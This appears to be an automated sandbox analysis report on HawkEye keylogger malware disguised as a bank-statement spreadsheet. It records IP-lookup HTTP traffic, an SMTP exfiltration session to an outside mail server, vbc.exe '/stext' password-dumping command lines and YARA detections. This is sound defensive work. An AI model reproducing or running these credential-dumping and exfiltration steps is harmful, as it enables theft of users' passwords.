                                                                              Nov 19, 2020 16:02:54.541414976 CET | 1096 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:02:54 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:02:54 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a0b73b000097f6a09da000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad09ecebf97f6-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              1 | 192.168.2.4 | 49764 | 104.16.155.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:03:42.927691936 CET | 2233 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:03:42.956650972 CET | 2234 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:03:42 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:03:42 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a1745600002bd6a58a5000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad1cd5d052bd6-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              2 | 192.168.2.4 | 49774 | 104.16.155.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:03:58.127439022 CET | 6336 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:03:58.157450914 CET | 6337 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:03:58 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:03:58 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a1afb50000dfcfea8ac000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad22c5b78dfcf-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              3 | 192.168.2.4 | 49783 | 104.16.154.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:04:22.275377035 CET | 6390 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:22.298597097 CET | 6391 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:22 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:22 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a20e0900002b29571f3000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad2c34bba2b29-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              4 | 192.168.2.4 | 49789 | 104.16.154.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:04:36.009860039 CET | 6414 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:36.037992001 CET | 6414 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:36 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:36 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a243b00000c29552921000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad3191c7fc295-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                              5 | 192.168.2.4 | 49794 | 104.16.154.36 | 80 | C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                              Nov 19, 2020 16:04:47.301661015 CET | 6429 | OUT | GET / HTTP/1.1
                                                                              Host: whatismyipaddress.com
                                                                              Connection: Keep-Alive
                                                                              Nov 19, 2020 16:04:47.330806971 CET | 6430 | IN | HTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 19 Nov 2020 15:04:47 GMT
                                                                              Transfer-Encoding: chunked
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Thu, 19 Nov 2020 16:04:47 GMT
                                                                              Location: https://whatismyipaddress.com/
                                                                              cf-request-id: 0682a26fcf00000eaf462bc000000001
                                                                              Server: cloudflare
                                                                              CF-RAY: 5f4ad35fbef10eaf-FRA
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              SMTP Packets

                                                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                              Nov 19, 2020 16:03:09.597856998 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 08:03:09 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Nov 19, 2020 16:03:09.598325968 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 936905
                                                                              Nov 19, 2020 16:03:09.869668961 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 936905 [84.17.52.25]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-CHUNKING
                                                                              250-STARTTLS
                                                                              250-SMTPUTF8
                                                                              250 HELP
                                                                              Nov 19, 2020 16:03:09.873588085 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                              Nov 19, 2020 16:03:10.145303011 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                              Nov 19, 2020 16:03:10.425162077 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
                                                                              Nov 19, 2020 16:03:10.426595926 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:03:10.697953939 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 250 OK
                                                                              Nov 19, 2020 16:03:10.699817896 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | RCPT TO:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:03:10.972868919 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 250 Accepted
                                                                              Nov 19, 2020 16:03:10.973298073 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | DATA
                                                                              Nov 19, 2020 16:03:11.244570017 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                              Nov 19, 2020 16:03:11.245651960 CET | 49746 | 587 | 192.168.2.4 | 166.62.27.57 | .
                                                                              Nov 19, 2020 16:03:11.527730942 CET | 587 | 49746 | 166.62.27.57 | 192.168.2.4 | 250 OK id=1kflSp-007rOY-24
                                                                              Nov 19, 2020 16:04:11.305751085 CET | 587 | 49780 | 166.62.27.57 | 192.168.2.4 | 220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Thu, 19 Nov 2020 08:04:11 -0700
                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                              220 and/or bulk e-mail.
                                                                              Nov 19, 2020 16:04:11.306165934 CET | 49780 | 587 | 192.168.2.4 | 166.62.27.57 | EHLO 936905
                                                                              Nov 19, 2020 16:04:11.568952084 CET | 587 | 49780 | 166.62.27.57 | 192.168.2.4 | 250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 936905 [84.17.52.25]
                                                                              250-SIZE 52428800
                                                                              250-8BITMIME
                                                                              250-PIPELINING
                                                                              250-AUTH PLAIN LOGIN
                                                                              250-CHUNKING
                                                                              250-STARTTLS
                                                                              250-SMTPUTF8
                                                                              250 HELP
                                                                              Nov 19, 2020 16:04:11.569655895 CET | 49780 | 587 | 192.168.2.4 | 166.62.27.57 | AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                              Nov 19, 2020 16:04:11.837136030 CET | 587 | 49780 | 166.62.27.57 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                              Nov 19, 2020 16:04:12.112052917 CET | 587 | 49780 | 166.62.27.57 | 192.168.2.4 | 235 Authentication succeeded
                                                                              Nov 19, 2020 16:04:12.112370968 CET | 49780 | 587 | 192.168.2.4 | 166.62.27.57 | MAIL FROM:<ansaf@iigcest.com>
                                                                              Nov 19, 2020 16:04:12.375014067 CET | 587 | 49780 | 166.62.27.57 | 192.168.2.4 | 250 OK

                                                                              Code Manipulations

                                                                              Statistics

                                                                              CPU Usage

                                                                              Memory Usage

                                                                              High Level Behavior Distribution

                                                                              Behavior

                                                                              System Behavior

                                                                              General

                                                                              Start time: 16:02:43
                                                                              Start date: 19/11/2020
                                                                              Path: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit): true
                                                                              Commandline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                                                                              Imagebase: 0x400000
                                                                              File size: 965120 bytes
                                                                              MD5 hash: DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges: true
                                                                              Has administrator privileges: true
                                                                              Programmed in: Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation: low

                                                                              General

                                                                              Start time: 16:02:43
                                                                              Start date: 19/11/2020
                                                                              Path: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit): true
                                                                              Commandline: 'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe'
                                                                              Imagebase: 0x400000
                                                                              File size: 965120 bytes
                                                                              MD5 hash: DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges: true
                                                                              Has administrator privileges: true
                                                                              Programmed in: .Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.765706717.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.765500046.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.766725359.0000000002292000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.771774923.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:02:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 4500 5715437
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:02:55
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2264
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:02:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:02:59
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                              Imagebase:0x400000
                                                                              File size:1171592 bytes
                                                                              MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000007.00000002.704959597.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                              Reputation:high

                                                                              General

                                                                              Start time:16:03:38
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              General

                                                                              Start time:16:03:39
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.803619602.0000000002F08000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.803780001.0000000003A81000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
